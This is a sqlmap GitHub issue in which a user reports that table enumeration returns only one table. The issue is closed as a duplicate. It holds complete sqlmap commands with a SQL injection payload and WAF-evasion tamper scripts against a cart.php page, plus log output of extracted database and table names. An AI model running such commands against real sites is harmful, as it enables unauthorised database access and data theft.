### ISSUE TITLE
sqlmap is not outputing all the tables and extracting them in one line

### ISSUE THREAD

**Issue by ZED022** [sqlmapproject/sqlmap#3892] opened 2019-08-23 16:31 UTC
sqlmap is not Extracting all the tables
Hello, i'm amateur in sqlmap , i was trying to extract tables , it shows that sqlmap extracting tables on the same line then output just one table

 sqlmap.py -u https://www.site.com/cart.php --data="addtocartBt=add%20to%20cart&productId=2299%20AND%203*2*1%3d6%20AND%20224%3d224&pst=7&quantity=3&variants%5b730%5d=2125" -p productId --no-cast --tamper=randomcase,between,space2comment --level 3 --risk 3 --dbs 

it gaves me this output: 

[09:25:50] [INFO] used SQL query returns 2 entries
[09:25:50] [INFO] resumed: '2','information_schema'
[09:25:50] [INFO] resumed: '2','information_schema','database'
available databases [3]:
[*] 2
[*] information_schema
[*] database

then if i would extract the tables 

sqlmap.py -u https://www.site.com/cart.php --data="addtocartBt=add%20to%20cart&productId=2299%20AND%203*2*1%3d6%20AND%20224%3d224&pst=7&quantity=3&variants%5b730%5d=2125" -p productId --no-cast --tamper=randomcase,between,space2comment --level 3 --risk 3 -D information_schema --tables

it shows like that : 

[07:06:03] [INFO] used SQL query returns 62 entries
[07:06:03] [INFO] starting 10 threads
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY'
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY','FI...
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY','FI...
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY','FI...

[07:06:09] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[07:06:11] [WARNING] user aborted during enumeration. sqlmap will display partial output
Database: 62
[1 table]
+---------------------------------------+
| COLLATION_CHARACTER_SET_APPLICABILITY |
+---------------------------------------+
and it output one table 
![a](https://user-images.githubusercontent.com/54448760/63608009-6d9fe200-c5c3-11e9-9e24-295e5079e1b5.jpg)

**Comment by stamparm** [comment] 2019-08-25 10:49
Duplicate of #3893

**Closed by stamparm** 2019-08-25 10:49 UTC
Labels: bug report
